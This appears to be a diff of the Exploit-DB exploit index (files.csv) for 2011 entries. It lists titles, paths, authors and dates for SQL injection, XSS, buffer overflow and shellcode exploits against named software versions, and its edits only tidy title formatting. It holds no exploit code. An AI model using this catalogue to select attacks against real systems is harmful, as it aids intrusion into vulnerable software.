17101,platforms/php/webapps/17101.txt,"ilchClan 1.0.5 (regist.php) SQL Injection Vulnerabiility",2011-04-02,"Easy Laster",php,webapps,0 17102,platforms/php/webapps/17102.txt,"Anzeigenmarkt 2011 (index.php) SQL Injection Vulnerability",2011-04-02,"Easy Laster",php,webapps,0 @@ -14853,7 +14853,7 @@ id,file,description,date,author,platform,type,port 17106,platforms/php/webapps/17106.txt,"Rash CMS SQL Injection Vulnerability",2011-04-03,keracker,php,webapps,0 17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script SQL Injection Vulnerability",2011-04-03,Egyptian.H4x0rz,php,webapps,0 17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion Vulnerabilities",2011-04-03,KedAns-Dz,php,webapps,0 -17110,platforms/php/webapps/17110.txt,"DoceboLMS 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 +17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) Stored and Reflective XSS Vulnerabilities",2011-04-04,"Michael Brooks",multiple,webapps,0 17112,platforms/hardware/webapps/17112.txt,"Encore ENPS-2012 Cross-site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 17113,platforms/hardware/webapps/17113.txt,"TP-Link TL-PS110U & TL-PS110P Cross-site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 @@ -14864,8 +14864,8 @@ id,file,description,date,author,platform,type,port 17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 17119,platforms/php/webapps/17119.txt,"Wordpress Plugin Custom Pages 0.5.0.1 - LFI Vulnerability",2011-04-05,"AutoSec Tools",php,webapps,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 'fnmatch()' Function Stack Corruption Vulnerability",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 -17123,platforms/php/webapps/17123.txt,"TutorialMS 1.4 (show) - Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 -17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) Buffer Overflow + ROP exploit",2011-04-06,Nate_M,windows,local,0 +17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 +17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) Buffer Overflow + ROP Exploit",2011-04-06,Nate_M,windows,local,0 17125,platforms/php/webapps/17125.txt,"Dream Vision Technologies Web Portal SQL Injection Vulnerability",2011-04-06,eXeSoul,php,webapps,0 17126,platforms/php/webapps/17126.html,"Graugon Forum 1.3 - SQL Injection Vulnerability",2011-04-06,"AutoSec Tools",php,webapps,0 17127,platforms/php/webapps/17127.txt,"eyeos 2.3 - Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",php,webapps,0 @@ -14876,7 +14876,7 @@ id,file,description,date,author,platform,type,port 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17136,platforms/php/webapps/17136.txt,"Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability",2011-04-09,eidelweiss,php,webapps,0 -17137,platforms/php/webapps/17137.txt,"NooMS CMS 1.1.1 - CSRF",2011-04-09,loneferret,php,webapps,0 +17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - CSRF",2011-04-09,loneferret,php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin SQLi Vulnerability",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 @@ -14904,16 +14904,16 @@ id,file,description,date,author,platform,type,port 17165,platforms/php/webapps/17165.py,"TinyBB 1.4 - Blind SQL Injection and Path Disclosure",2011-04-13,swami,php,webapps,0 17166,platforms/windows/local/17166.py,"PlaylistMaker 1.5 - .txt File - Buffer Overflow Vulnerability",2011-04-13,"C4SS!0 G0M3S",windows,local,0 17169,platforms/bsd/local/17169.pl,"NEdit 5.5 - Format String Vulnerability",2011-04-14,Tosh,bsd,local,0 -17170,platforms/php/webapps/17170.txt,"EZ-Shop 1.02 Lateral SQL Injection Vulnerability",2011-04-14,Osirys,php,webapps,0 +17170,platforms/php/webapps/17170.txt,"EZ-Shop 1.02 - Lateral SQL Injection Vulnerability",2011-04-14,Osirys,php,webapps,0 17171,platforms/windows/local/17171.pl,"SimplyPlay v.66 .pls File Buffer Overflow Vulnerability",2011-04-14,"C4SS!0 G0M3S",windows,local,0 17172,platforms/php/webapps/17172.txt,"cPassMan 1.82 - Arbitrary File Download",2011-04-15,"Sense of Security",php,webapps,0 17173,platforms/php/webapps/17173.txt,"TextAds 2.08 Script Cross Site Scripting Vulnerability",2011-04-15,"Ashiyane Digital Security Team",php,webapps,0 17174,platforms/multiple/webapps/17174.txt,"SQL-Ledger <= 2.8.33 Post-authentication Local File Include/Edit Vulnerability",2011-04-15,bitform,multiple,webapps,0 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0 -17177,platforms/windows/local/17177.rb,"MS Word 2003 - Record Parsing Buffer Overflow (meta) (MS09-027)",2011-04-16,"Andrew King",windows,local,0 +17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (meta) (MS09-027)",2011-04-16,"Andrew King",windows,local,0 17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0 -17179,platforms/php/webapps/17179.txt,"Bedder CMS Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0 +17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0 17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote,0 17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection Vulnerability",2011-04-17,"vir0e5 ",php,webapps,0 @@ -14923,7 +14923,7 @@ id,file,description,date,author,platform,type,port 17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 17191,platforms/php/webapps/17191.txt,"Ultimate eShop Error Based SQL Injection Vulnerability",2011-04-20,Romka,php,webapps,0 -17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 +17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 - Multiple CSRF Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0 17194,platforms/linux/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 - 69 bytes",2011-04-21,"Jonathan Salwan",linux,shellcode,0 17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,remote,0 @@ -14950,7 +14950,7 @@ id,file,description,date,author,platform,type,port 17217,platforms/windows/local/17217.py,"Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow Exploit",2011-04-27,"Brandon Murphy",windows,local,0 17218,platforms/php/webapps/17218.txt,"Symphony CMS 2.1.2 - Blind SQL Injection",2011-04-27,Wireghoul,php,webapps,0 17219,platforms/windows/remote/17219.rb,"EMC HomeBase Server Directory Traversal Remote Code Execution",2011-04-27,metasploit,windows,remote,18821 -17220,platforms/php/webapps/17220.txt,"eyeos <= 1.9.0.2 - Stored XSS vulnerability using image files",2011-04-28,"Alberto Ortega",php,webapps,0 +17220,platforms/php/webapps/17220.txt,"eyeos <= 1.9.0.2 - Stored XSS Vulnerability using image files",2011-04-28,"Alberto Ortega",php,webapps,0 17221,platforms/php/webapps/17221.txt,"kusaba x <= 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"libmodplug <= 0.8.8.2 .abc Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0, 9.1, 9.2, 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 @@ -14962,10 +14962,10 @@ id,file,description,date,author,platform,type,port 17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow",2011-04-30,metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 .s3m Stack Buffer Overflow",2011-04-30,metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS SQL Injection Vulnerability",2011-05-02,Alexander,php,webapps,0 -17235,platforms/php/webapps/17235.html,"Exponent CMS 2.0 Beta 1.1 CSRF Add Administrator Account PoC",2011-05-02,outlaw.dll,php,webapps,0 +17235,platforms/php/webapps/17235.html,"Exponent CMS 2.0 Beta 1.1 - CSRF Add Administrator Account PoC",2011-05-02,outlaw.dll,php,webapps,0 17236,platforms/php/webapps/17236.txt,"Travel411 SQL Injection Vulnerability",2011-05-02,Caddy-Dz,php,webapps,0 17237,platforms/php/webapps/17237.txt,"Horizon Web Builder (fshow.php) SQL Injection Vulnerability",2011-05-03,"Iolo Morganwg",php,webapps,0 -17238,platforms/php/webapps/17238.html,"Front Accounting 2.3.4 CSRF Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0 +17238,platforms/php/webapps/17238.html,"Front Accounting 2.3.4 - CSRF Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0 17239,platforms/php/webapps/17239.txt,"Time and Expense Management System Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",php,webapps,0 17240,platforms/windows/remote/17240.html,"ICONICS WebHMI ActiveX Stack Overflow",2011-05-03,"sgb and bls",windows,remote,0 17242,platforms/asp/webapps/17242.txt,"Sothink DHTML Menu SQL Injection Vulnerability",2011-05-04,Caddy-Dz,asp,webapps,0 @@ -14973,9 +14973,9 @@ id,file,description,date,author,platform,type,port 17244,platforms/hardware/remote/17244.txt,"ZyWALL USG - Appliance Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0 17248,platforms/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17250,platforms/php/webapps/17250.txt,"phpThumb 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps,0 -17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 CSRF Vulnerability",2011-05-06,"High-Tech Bridge SA",php,webapps,0 +17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - CSRF Vulnerability",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17252,platforms/windows/remote/17252.rb,"VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow",2011-04-08,metasploit,windows,remote,0 -17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal vulnerability",2011-05-07,"Raffaele Forte",cgi,webapps,0 +17259,platforms/cgi/webapps/17259.txt,"f-fileman 7.0 - Directory Traversal Vulnerability",2011-05-07,"Raffaele Forte",cgi,webapps,0 17264,platforms/php/webapps/17264.txt,"Joomla Component com_versioning SQLi Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0 17265,platforms/php/webapps/17265.txt,"Joomla Component com_hello SQL Injection Vulnerability",2011-05-09,the_cyber_nuxbie,php,webapps,0 17266,platforms/windows/dos/17266.txt,"serva32 1.2.00 rc1 - Multiple Vulnerabilities",2011-05-10,"AutoSec Tools",windows,dos,0 @@ -14983,7 +14983,7 @@ id,file,description,date,author,platform,type,port 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,metasploit,windows,remote,0 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,metasploit,windows,remote,0 17270,platforms/windows/local/17270.pl,"Chasys Media Player 2.0 - Buffer Overflow Exploit (SEH)",2011-05-11,h1ch4m,windows,local,0 -17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences 0day",2011-05-12,"Stefan LE BERRE",windows,dos,0 +17273,platforms/windows/dos/17273.c,"Symantec Backup Exec System Recovery 8.5 - Kernel Pointers Dereferences (0day)",2011-05-12,"Stefan LE BERRE",windows,dos,0 17274,platforms/windows/dos/17274.txt,"SlimPDF Reader PoC",2011-05-12,"Nicolas Krassas",windows,dos,0 17275,platforms/windows/local/17275.pl,"A-PDF All to MP3 Converter 2.0.0 DEP Bypass",2011-05-12,h1ch4m,windows,local,0 17276,platforms/windows/webapps/17276.txt,"Oracle GlassFish Server Administration Console Authentication Bypass",2011-05-12,"Core Security",windows,webapps,0 @@ -14992,7 +14992,7 @@ id,file,description,date,author,platform,type,port 17279,platforms/hardware/remote/17279.txt,"DreamBox DM500(+) - Arbitrary File Download Vulnerability",2011-05-13,LiquidWorm,hardware,remote,0 17284,platforms/php/webapps/17284.txt,"EditorMonkey WordPress Plugin (FCKeditor) 2.5 - Arbitrary File Upload",2011-05-14,kaMtiEz,php,webapps,0 17285,platforms/php/webapps/17285.php,"osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability",2011-05-14,"Number 7",php,webapps,0 -17287,platforms/windows/dos/17287.mid,"Winamp 5.61 'in_midi' component heap overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 +17287,platforms/windows/dos/17287.mid,"Winamp 5.61 'in_midi' component heap Overflow (crash only)",2011-05-15,"Alexander Gavrun",windows,dos,0 17288,platforms/php/webapps/17288.txt,"Joomla Component com_question - SQL Injection Vulnerability",2011-05-15,"NeX HaCkEr",php,webapps,0 17289,platforms/php/webapps/17289.txt,"frame-oshop SQL Injection Vulnerability",2011-05-15,-SmoG-,php,webapps,0 17290,platforms/hardware/remote/17290.txt,"XtreamerPRO Media-player 2.6.0 & 2.7.0 - Multiple Vulnerabilities",2011-05-16,"Itzik Chen",hardware,remote,0 @@ -15033,7 +15033,7 @@ id,file,description,date,author,platform,type,port 17327,platforms/php/webapps/17327.txt,"HB Ecommerce SQL Injection Vulnerability",2011-05-27,takeshix,php,webapps,0 17328,platforms/windows/remote/17328.html,"Magneto ICMP ActiveX 4.0.0.20 - ICMPSendEchoRequest Remote Code Execute",2011-05-27,boahat,windows,remote,0 17329,platforms/windows/local/17329.rb,"Magix Musik Maker 16 - .mmm Stack Buffer Overflow (without egg-hunter)",2011-05-27,"Alexey Sintsov",windows,local,0 -17330,platforms/php/webapps/17330.html,"cPanel < 11.25 CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0 +17330,platforms/php/webapps/17330.html,"cPanel < 11.25 - CSRF - Add User php Script",2011-05-27,ninjashell,php,webapps,0 17335,platforms/php/webapps/17335.txt,"Duhok Forum 1.1 - SQL Injection Vulnerability",2011-05-28,M.Jock3R,php,webapps,0 17336,platforms/php/webapps/17336.txt,"Guru Penny Auction Pro 3.0 - Blind SQL Injection Vulnerability",2011-05-28,v3n0m,php,webapps,0 17338,platforms/php/webapps/17338.txt,"Joomla Component com_jmsfileseller Local File Inclusion Vulnerability",2011-05-28,Valentin,php,webapps,0 @@ -15045,16 +15045,16 @@ id,file,description,date,author,platform,type,port 17346,platforms/php/webapps/17346.php,"w-Agora Forum 4.2.1 - Arbitrary File Upload Exploit",2011-05-30,"Treasure Priyamal",php,webapps,0 17347,platforms/php/webapps/17347.php,"Easy Media Script SQL Injection Vulnerability",2011-05-30,Lagripe-Dz,php,webapps,0 17349,platforms/hardware/webapps/17349.txt,"Belkin G Wireless Router F5D7234-4 v5 Exploit",2011-05-30,Aodrulez,hardware,webapps,0 -17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 Multiple SQL Injection Vulnerabilities",2011-05-30,v3n0m,php,webapps,0 +17350,platforms/php/webapps/17350.txt,"Guru JustAnswer Professional 1.25 - Multiple SQL Injection Vulnerabilities",2011-05-30,v3n0m,php,webapps,0 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities",2011-05-30,metasploit,windows,remote,0 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW series auth bypass printer flooder",2011-05-31,chrisB,hardware,dos,0 17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Post-Authentication BoF",2011-06-01,b33f,windows,remote,0 17355,platforms/windows/remote/17355.rb,"GoldenFTP 4.70 PASS Stack Buffer Overflow",2011-06-02,metasploit,windows,remote,21 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0 -17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 +17359,platforms/windows/remote/17359.pl,"Xitami Web Server 2.5b4 - Remote Buffer Overflow Exploit",2011-06-03,mr.pr0n,windows,remote,0 17360,platforms/windows/webapps/17360.txt,"WebSVN 2.3.2 Unproper Metacharacters Escaping exec() Remote Command Injection",2011-06-04,rgod,windows,webapps,0 -17361,platforms/windows/remote/17361.py,"Xitami Web Server 2.5b4 Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous ",windows,remote,0 +17361,platforms/windows/remote/17361.py,"Xitami Web Server 2.5b4 - Remote Buffer Overflow (Egghunter)",2011-06-04,"Glafkos Charalambous ",windows,remote,0 17362,platforms/windows/local/17362.cpp,"OpenDrive <= 1.3.141 Local Password Disclosure",2011-06-04,"Glafkos Charalambous ",windows,local,0 17363,platforms/windows/dos/17363.pl,"1ClickUnzip 3.00 .ZIP File Heap Overflow Vulnerability",2011-06-06,"C4SS!0 G0M3S",windows,dos,0 17364,platforms/windows/local/17364.py,"The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit XPSP3 DEP Bypass",2011-06-06,"dookie and ronin",windows,local,0 @@ -15062,10 +15062,10 @@ id,file,description,date,author,platform,type,port 17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",2011-06-06,metasploit,windows,remote,0 17367,platforms/php/webapps/17367.html,"Dataface Local File Include",2011-06-07,ITSecTeam,php,webapps,0 17371,platforms/linux/shellcode/17371.txt,"Linux/x86-32 - ConnectBack with SSL connection - 422 bytes",2011-06-08,"Jonathan Salwan",linux,shellcode,0 -17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 +17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF playlist parser",2011-06-08,TecR0c,windows,dos,0 17373,platforms/windows/remote/17373.py,"ActFax Server FTP Remote BOF (post auth) Bigger Buffer",2011-06-08,b33f,windows,remote,0 -17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow",2011-06-09,metasploit,windows,remote,0 -17375,platforms/asp/webapps/17375.txt,"EquiPCS SQL Injection vulnerability exploit",2011-06-09,Sideswipe,asp,webapps,0 +17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,metasploit,windows,remote,0 +17375,platforms/asp/webapps/17375.txt,"EquiPCS SQL Injection Vulnerability Exploit",2011-06-09,Sideswipe,asp,webapps,0 17376,platforms/hardware/webapps/17376.txt,"Aastra IP Phone 9480i Web Interface Data disclosure Vulnerability",2011-06-09,"Yakir Wizman",hardware,webapps,0 17377,platforms/hardware/webapps/17377.txt,"Polycom IP Phone Web Interface Data Diclosure Vulnerability",2011-06-09,"Yakir Wizman",hardware,webapps,0 17378,platforms/php/webapps/17378.py,"Pacer Edition CMS 2.1 (rm) Remote Arbitrary File Deletion Exploit",2011-06-10,LiquidWorm,php,webapps,0 @@ -15074,23 +15074,23 @@ id,file,description,date,author,platform,type,port 17381,platforms/windows/remote/17381.txt,"simple web-server 1.2 - Directory Traversal",2011-06-10,"AutoSec Tools",windows,remote,0 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 .mp3 Buffer Overflow Exploit (Win7 + ASLR bypass mod)",2011-06-11,xsploitedsec,windows,local,0 -17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow vulnerability",2011-06-11,huimaozi,windows,dos,0 +17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow Vulnerability",2011-06-11,huimaozi,windows,dos,0 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection Vulnerability",2011-06-11,BlueH4G,php,webapps,0 17390,platforms/php/webapps/17390.txt,"SUBRION CMS Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0 17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0 -17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 0day File Inclusion Vulnerability",2011-06-13,jdc,php,webapps,0 +17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion Vulnerability (0day)",2011-06-13,jdc,php,webapps,0 17395,platforms/php/webapps/17395.txt,"cubecart 2.0.7 - Multiple Vulnerabilities",2011-06-14,Shamus,php,webapps,0 -17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 Remote Crash",2011-06-14,echo,windows,dos,0 +17396,platforms/windows/dos/17396.html,"Opera Web Browser 11.11 - Remote Crash",2011-06-14,echo,windows,dos,0 17398,platforms/windows/dos/17398.txt,"Windows Media Player with K-Lite Codec Pack DoS PoC",2011-06-14,"Nicolas Krassas",windows,dos,0 17399,platforms/windows/dos/17399.txt,"Microsoft Office XP Remote code Execution",2011-06-14,"Francis Provencher",windows,dos,0 17400,platforms/linux/dos/17400.c,"Conky Linux 1.8.0 - Local DoS/PoC Exploit",2011-06-14,"Arturo D'Elia",linux,dos,0 -17401,platforms/windows/dos/17401.txt,"MS HyperV Persistent DoS Vulnerability",2011-06-14,"Core Security",windows,dos,0 +17401,platforms/windows/dos/17401.txt,"Microsoft HyperV Persistent DoS Vulnerability",2011-06-14,"Core Security",windows,dos,0 17402,platforms/php/webapps/17402.txt,"AMHSHOP 3.7.0 - SQL Injection",2011-06-15,"Yassin Aboukir",php,webapps,0 17403,platforms/php/webapps/17403.txt,"Free Simple CMS 1.0 - Multiple Vulnerabilities",2011-06-15,"High-Tech Bridge SA",php,webapps,0 -17404,platforms/multiple/webapps/17404.txt,"IBM WebSphere Application Server 7.0.0.13 CSRF Vulnerability",2011-06-15,"Core Security",multiple,webapps,0 +17404,platforms/multiple/webapps/17404.txt,"IBM WebSphere Application Server 7.0.0.13 - CSRF Vulnerability",2011-06-15,"Core Security",multiple,webapps,0 17405,platforms/windows/dos/17405.txt,"Adobe Reader/Acrobat 10.0.1 DoS Exploit",2011-06-16,"Soroush Dalili",windows,dos,0 17406,platforms/php/webapps/17406.txt,"Catalog Builder - Ecommerce Software - Blind SQL Injection",2011-06-16,takeshix,php,webapps,0 17408,platforms/php/webapps/17408.txt,"WeBid 1.0.2 persistent XSS via SQL Injection",2011-06-17,Saif,php,webapps,0 @@ -15100,7 +15100,7 @@ id,file,description,date,author,platform,type,port 17412,platforms/php/webapps/17412.txt,"Joomla Component (com_team) SQL Injection Vulnerability",2011-06-19,CoBRa_21,php,webapps,0 17413,platforms/php/webapps/17413.txt,"Burning Board 3.1.5 Full Path Disclosure",2011-06-19,linc0ln.dll,php,webapps,0 17414,platforms/php/webapps/17414.txt,"Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability",2011-06-19,"Chip d3 bi0s",php,webapps,0 -17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() exploit",2011-06-20,mr_me,windows,remote,0 +17415,platforms/windows/remote/17415.rb,"Black Ice Cover Page SDK insecure method DownloadImageFileURL() Exploit",2011-06-20,mr_me,windows,remote,0 17416,platforms/windows/remote/17416.html,"Black Ice Fax Voice SDK 12.6 - Remote Code Execution Exploit",2011-06-20,mr_me,windows,remote,0 17417,platforms/windows/remote/17417.rb,"DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow",2011-06-20,metasploit,windows,remote,0 17418,platforms/php/webapps/17418.rb,"If-CMS 2.07 Pre-Auth Local File Inclusion Exploit",2011-06-20,TecR0c,php,webapps,0 @@ -15118,12 +15118,12 @@ id,file,description,date,author,platform,type,port 17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0 17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0 17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0 -17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0 +17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0 17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0 17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0 17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 .fat Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0 -17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal vulnerability",2011-06-23,xistence,jsp,webapps,0 -17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 +17442,platforms/jsp/webapps/17442.txt,"manageengine support center plus 7.8 build <= 7801 - Directory Traversal Vulnerability",2011-06-23,xistence,jsp,webapps,0 +17443,platforms/cgi/webapps/17443.txt,"ActivDesk 3.0 - Multiple security vulnerabilities",2011-06-23,"Brendan Coles",cgi,webapps,0 17444,platforms/php/webapps/17444.txt,"Webcat Multiple Blind SQL Injection Vulnerabilities",2011-06-23,w0rd,php,webapps,0 17445,platforms/php/webapps/17445.txt,"2Point Solutions (cmspages.php) SQL Injection Vulnerability",2011-06-23,"Newbie Campuz",php,webapps,0 17446,platforms/php/webapps/17446.txt,"nodesforum 1.059 - Remote File Inclusion Vulnerability",2011-06-23,bd0rk,php,webapps,0 @@ -15132,7 +15132,7 @@ id,file,description,date,author,platform,type,port 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",2011-06-25,metasploit,windows,remote,0 17451,platforms/windows/local/17451.rb,"Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability",2011-06-26,metasploit,windows,local,0 17452,platforms/php/webapps/17452.txt,"JoomlaXi Persistent XSS Vulnerability",2011-06-26,"Karthik R",php,webapps,0 -17453,platforms/php/webapps/17453.txt,"Wordpress Beer Recipes Plugin 1.0 XSS",2011-06-26,TheUzuki.',php,webapps,0 +17453,platforms/php/webapps/17453.txt,"Wordpress Beer Recipes Plugin 1.0 - XSS",2011-06-26,TheUzuki.',php,webapps,0 17455,platforms/windows/dos/17455.rb,"Smallftpd 1.0.3 FTP Server Denial of Service Vulnerability",2011-06-27,"Myo Soe",windows,dos,0 